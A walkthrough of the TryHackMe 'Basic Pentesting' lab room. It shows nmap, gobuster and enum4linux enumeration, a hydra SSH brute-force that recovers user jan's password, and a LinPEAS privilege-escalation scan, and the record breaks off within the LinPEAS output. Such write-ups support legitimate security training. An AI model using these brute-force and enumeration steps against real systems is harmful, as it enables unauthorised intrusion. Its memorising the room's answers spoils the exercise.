TryHackMe - Basic Pentesting
Table of Contents
# Room info
- Name: Basic Pentesting
- Link: https://tryhackme.com/room/basicpentestingjt
- Subscription: Free
- Difficulty: Easy
- Description: This is a machine that allows you to practise web app hacking and privilege escalation
# Questions
- Deploy the machine and connect to our network
- Find the services exposed by the machine
- What is the name of the hidden directory on the web server(enter name without /)?
- User brute-forcing to find the username & password
- What is the username?
- What is the password?
- What service do you use to access the server(answer in abbreviation in all caps)?
- Enumerate the machine to find any vectors for privilege escalation
- What is the name of the other user you found(all lower case)?
- If you have found another user, what can you do with this information?
- What is the final password you obtain?
# Question 1 - Deploy the machine and connect to our network
No answer needed.
# Question 2 - Find the services exposed by the machine
No answer needed, but we can use nmap to find the services exposed by the machhine, usefull for the next questions.
$ nmap -sC -sV 10.10.131.121
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 14:46 CEST
Nmap scan report for 10.10.131.121 (10.10.131.121)
Host is up (0.080s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13?
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy
|_http-favicon: Apache Tomcat
| fingerprint-strings:
| DNSStatusRequestTCP, Help:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sun, 30 Apr 2023 12:47:41 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=4/30%Time=644E636E%P=x86_64-pc-linux-gnu%r(DN
SF:SStatusRequestTCP,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/ht
SF:ml;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\
SF:r\nDate:\x20Sun,\x2030\x20Apr\x202023\x2012:47:41\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20
SF:type=\"text/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:whit
SF:e;background-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahom
SF:a,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;
SF:}\x20h3\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-
SF:color:#525D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,san
SF:s-serif;color:black;background-color:white;}\x20b\x20{font-family:Tahom
SF:a,Arial,sans-serif;color:white;background-color:#525D76;}\x20p\x20{font
SF:-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:
SF:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x2
SF:0{height:1px;background-color:#525D76;border:none;}</style></head><bod"
SF:)%r(Help,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sun,\x2030\x20Apr\x202023\x2012:47:41\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2023-04-30T08:47:47-04:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-30T12:47:47
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.01 seconds
# Question 3 - What is the name of the hidden directory on the web server(enter name without /)?
Try with gobuster to find the hidden directory.
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 10.10.131.121 -q
/.htpasswd (Status: 403) [Size: 297]
/.htaccess (Status: 403) [Size: 297]
/.hta (Status: 403) [Size: 292]
/development (Status: 301) [Size: 320] [--> http://10.10.131.121/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 301]
So the answer is development.
# Question 4 - User brute-forcing to find the username & password
No answer needed, but there are two files in the hidden directory, dev.txt
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
and j.txt
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
SMB is configured so we can try to get the username:
$ enum4linux -a 10.10.131.121
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 30 14:57:31 2023
=========================================( Target Information )=========================================
Target ........... 10.10.131.121
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.131.121 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 10.10.131.121 )===============================
Looking up status of 10.10.131.121
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.131.121 )===================================
[+] Server 10.10.131.121 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.131.121 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.131.121 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.131.121 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.131.121 )=======================================
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
=================================( Share Enumeration on 10.10.131.121 )=================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on 10.10.131.121
//10.10.131.121/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.131.121/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 10.10.131.121 )===========================
[+] Attaching to 10.10.131.121 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] BASIC2
[+] Builtin
[+] Password Info for Domain: BASIC2
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 10.10.131.121 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.131.121 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
===============================( Getting printer info for 10.10.131.121 )===============================
No printers returned.
Nice, two users kay and jan. From the file J.txt we can see that jan have a weak password. We can use hydra to bruteforce the password.
$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.131.121 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-30 15:03:29
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.131.121:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[STATUS] 109.00 tries/min, 327 tries in 00:03h, 14344075 to do in 2193:18h, 13 active
[STATUS] 95.14 tries/min, 666 tries in 00:07h, 14343736 to do in 2512:40h, 13 active
[22][ssh] host: 10.10.131.121 login: jan password: armando
# Question 5 - What is the username?
The answer is jan.
# Question 6 - What is the password?
The answer is armando.
# Question 7 - What service do you use to access the server(answer in abbreviation in all caps)?
The answer is SSH.
# Question 8 - Enumerate the machine to find any vectors for privilege escalation
No answer needed, but we can use LinPEAS to enumerate the machine.
jan@basic2:/tmp$ ./linpeas.sh
linpeas v2.2.7 by carlospolop
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEYEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangenta: Your username
====================================( Basic information )=====================================
OS: Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
User & Groups: uid=1001(jan) gid=1001(jan) groups=1001(jan)
Hostname: basic2
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (You can use linpeas to discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (You can use linpeas to discover hosts/port scanning, learn more with -h)
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
Distributor ID: Ubuntu
Description: Ubuntu 16.04.4 LTS
Release: 16.04
Codename: xenial
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16
[+] PATH
[i] Any writable folder in original PATH? (a new completed path will be exported)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[+] Date
Sun Apr 30 09:15:46 EDT 2023
[+] System stats
Filesystem Size Used Avail Use% Mounted on
udev 224M 0 224M 0% /dev
tmpfs 49M 3.3M 46M 7% /run
/dev/xvda1 14G 2.4G 11G 19% /
tmpfs 244M 0 244M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 244M 0 244M 0% /sys/fs/cgroup
tmpfs 49M 0 49M 0% /run/user/1001
total used free shared buff/cache available
Mem: 498068 246808 31916 3152 219344 216392
Swap: 1045500 1312 1044188
[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/jan
SSH_CLIENT=10.8.32.129 34902 22
USER=jan
SHLVL=1
HOME=/home/jan
SSH_TTY=/dev/pts/0
LOGNAME=jan
_=./linpeas.sh
XDG_SESSION_ID=4
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.8.32.129 34902 10.10.131.121 22
HISTFILE=/dev/null
[+] Looking for Signature verification failed in dmseg
Not Found
[+] selinux enabled? .......... sestatus Not Found
[+] Printer? .......... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .......... Yes
=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)
[+] Unmounted file-system?
[i] Check if you can mount umounted devices
UUID=cdbcec40-cb66-49dd-ad6b-be757c8140cf / ext4 errors=remount-ro 0 1
UUID=db3bdca8-5517-4600-b896-e8479e05e44a none swap sw 0 0
====================================( Available Software )====================================
[+] Useful software?
/bin/nc
/bin/netcat
/bin/nc.traditional
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/sudo
[+] Installed compilers?
/usr/share/gcc-5
================================( Processes, Cron & Services )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.9 1.1 37828 5804 ? Ss 08:40 0:20 /sbin/init
root 359 0.0 0.5 27704 2960 ? Ss 08:40 0:00 /lib/systemd/systemd-journald
root 396 0.0 0.3 94772 1580 ? Ss 08:41 0:00 /sbin/lvmetad -f
root 416 0.1 0.7 44696 3812 ? Ss 08:41 0:02 /lib/systemd/systemd-udevd
systemd+ 498 0.0 0.4 100324 2384 ? Ssl 08:41 0:00 /lib/systemd/systemd-timesyncd
root 818 0.0 0.3 160904 1576 ? Ssl 08:41 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
root 821 0.0 0.5 29008 2720 ? Ss 08:41 0:00 /usr/sbin/cron -f
message+ 824 0.0 0.7 42900 3544 ? Ss 08:41 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 833 0.0 0.2 4396 1288 ? Ss 08:41 0:00 /usr/sbin/acpid
daemon 836 0.0 0.4 26044 2088 ? Ss 08:41 0:00 /usr/sbin/atd -f
syslog 841 0.0 0.6 256392 3168 ? Ssl 08:41 0:00 /usr/sbin/rsyslogd -n
root 856 0.0 0.6 28620 3064 ? Ss 08:41 0:00 /lib/systemd/systemd-logind
root 859 0.0 1.2 275896 6144 ? Ssl 08:41 0:00 /usr/lib/accountsservice/accounts-daemon
root 864 0.0 3.1 211344 15680 ? Ssl 08:41 0:00 /usr/lib/snapd/snapd
root 880 0.0 1.1 277176 5732 ? Ssl 08:41 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 881 0.0 0.0 13372 144 ? Ss 08:41 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 898 0.0 2.9 337920 14888 ? Ss 08:41 0:00 /usr/sbin/smbd -D
root 904 0.0 1.1 329804 5620 ? S 08:41 0:00 /usr/sbin/smbd -D
root 929 0.0 0.5 16124 2544 ? Ss 08:41 0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 933 0.0 1.2 337920 6336 ? S 08:41 0:00 /usr/sbin/smbd -D
root 990 0.0 1.1 65508 5696 ? Ss 08:41 0:00 /usr/sbin/sshd -D
tomcat9 1007 7.0 39.7 2548928 197980 ? Sl 08:41 2:24 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat-latest/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512m -Xmx512m -Dignore.endorsed.dirs= -classpath /opt/tomcat-latest/bin/bootstrap.jar:/opt/tomcat-latest/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat-latest -Dcatalina.home=/opt/tomcat-latest -Djava.io.tmpdir=/opt/tomcat-latest/temp org.apache.catalina.startup.Bootstrap start
root 1023 0.0 0.0 5220 152 ? Ss 08:41 0:00 /sbin/iscsid
root 1024 0.0 0.7 5720 3516 ? S<Ls 08:41 0:00 /sbin/iscsid
root 1132 0.0 0.3 15936 1580 tty1 Ss+ 08:41 0:00 /sbin/agetty --noclear tty1 linux
root 1136 0.0 0.4 15752 2032 ttyS0 Ss+ 08:41 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root 1168 0.0 0.8 71584 4156 ? Ss 08:41 0:00 /usr/sbin/apache2 -k start
www-data 1170 0.0 0.8 689100 4460 ? Sl 08:41 0:00 /usr/sbin/apache2 -k start
www-data 1171 0.0 0.9 558068 4556 ? Sl 08:41 0:00 /usr/sbin/apache2 -k start
root 1232 0.0 1.1 240008 5840 ? Ss 08:41 0:00 /usr/sbin/nmbd -D
jan 2361 0.0 0.9 45276 4568 ? Ss 09:15 0:00 /lib/systemd/systemd --user
jan 2362 0.0 0.3 61280 1972 ? S 09:15 0:00 (sd-pam)
jan 2396 0.0 0.6 92832 3360 ? S 09:15 0:00 sshd: jan@pts/0
jan 2397 0.0 1.0 22572 5260 pts/0 Ss 09:15 0:00 -bash
jan 2408 0.0 0.3 4504 1844 pts/0 S+ 09:15 0:00 /bin/sh ./linpeas.sh
jan 2593 0.0 0.6 37364 3288 pts/0 R+ 09:15 0:00 ps aux
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
0 lrwxrwxrwx 1 root root 4 Apr 17 2018 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Mar 8 2018 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Mar 8 2018 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Mar 8 2018 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Mar 8 2018 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Mar 8 2018 /lib/systemd/systemd-udevd
44K -rwxr-xr-x 1 root root 44K Nov 30 2017 /sbin/agetty
476K -rwxr-xr-x 1 root root 476K Mar 5 2018 /sbin/dhclient
0 lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26 2017 /sbin/iscsid
52K -rwxr-xr-x 1 root root 51K Apr 16 2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Nov 8 2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12 2017 /usr/bin/dbus-daemon
20K -rwxr-xr-x 1 root root 19K Nov 8 2017 /usr/bin/lxcfs
164K -rwxr-xr-x 1 root root 162K Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
0 lrwxrwxrwx 1 root root 15 Mar 14 2018 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -> ../jre/bin/java
16K -rwxr-xr-x 1 root root 15K Jan 17 2016 /usr/lib/policykit-1/polkitd
21M -rwxr-xr-x 1 root root 21M Nov 30 2017 /usr/lib/snapd/snapd
48K -rwxr-xr-x 1 root root 47K Apr 8 2016 /usr/sbin/acpid
648K -rwxr-xr-x 1 root root 647K Sep 18 2017 /usr/sbin/apache2
28K -rwxr-xr-x 1 root root 27K Jan 14 2016 /usr/sbin/atd
44K -rwxr-xr-x 1 root root 44K Apr 5 2016 /usr/sbin/cron
244K -rwxr-xr-x 1 root root 243K Mar 7 2018 /usr/sbin/nmbd
588K -rwxr-xr-x 1 root root 586K Apr 5 2016 /usr/sbin/rsyslogd
72K -rwxr-xr-x 1 root root 71K Mar 7 2018 /usr/sbin/smbd
776K -rwxr-xr-x 1 root root 773K Jan 18 2018 /usr/sbin/sshd
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 190 Apr 17 2018 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Apr 19 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 383 Mar 7 2016 samba
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
[+] Services
[i] Search for outdated versions
[ + ] acpid
[ + ] apache-htcacheclean
[ + ] apache2
[ + ] apparmor
[ + ] apport
[ + ] atd
[ - ] bootmisc.sh
[ - ] checkfs.sh
[ - ] checkroot-bootclean.sh
[ - ] checkroot.sh
[ + ] console-setup
[ + ] cron
[ - ] cryptdisks
[ - ] cryptdisks-early
[ + ] dbus
[ + ] grub-common
[ - ] hostname.sh
[ - ] hwclock.sh
[ + ] irqbalance
[ + ] iscsid
[ + ] keyboard-setup
[ - ] killprocs
[ + ] kmod
[ - ] lvm2
[ + ] lvm2-lvmetad
[ + ] lvm2-lvmpolld
[ + ] lxcfs
[ - ] lxd
[ + ] mdadm
[ - ] mdadm-waitidle
[ - ] mountall-bootclean.sh
[ - ] mountall.sh
[ - ] mountdevsubfs.sh
[ - ] mountkernfs.sh
[ - ] mountnfs-bootclean.sh
[ - ] mountnfs.sh
[ + ] networking
[ + ] nmbd
[ + ] ondemand
[ + ] open-iscsi
[ - ] open-vm-tools
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ + ] rc.local
[ + ] resolvconf
[ - ] rsync
[ + ] rsyslog
[ + ] samba
[ + ] samba-ad-dc
[ - ] screen-cleanup
[ - ] sendsigs
[ + ] smbd
[ + ] ssh
[ + ] udev
[ + ] ufw
[ - ] umountfs
[ - ] umountnfs.sh
[ - ] umountroot
[ + ] unattended-upgrades
[ + ] urandom
[ - ] uuidd
[ - ] x11-common
===================================( Network Information )====================================
[+] Hostname, hosts and DNS
basic2
127.0.0.1 localhost
127.0.1.1 basic2
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal
[+] Content of /etc/inetd.conf
/etc/inetd.conf Not Found
[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0 Link encap:Ethernet HWaddr 02:c6:6a:4e:79:1b
inet addr:10.10.131.121 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::c6:6aff:fe4e:791b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:17812 errors:0 dropped:0 overruns:0 frame:0
TX packets:17854 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2557460 (2.5 MB) TX bytes:4664918 (4.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:192 errors:0 dropped:0 overruns:0 frame:0
TX packets:192 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:14256 (14.2 KB) TX bytes:14256 (14.2 KB)
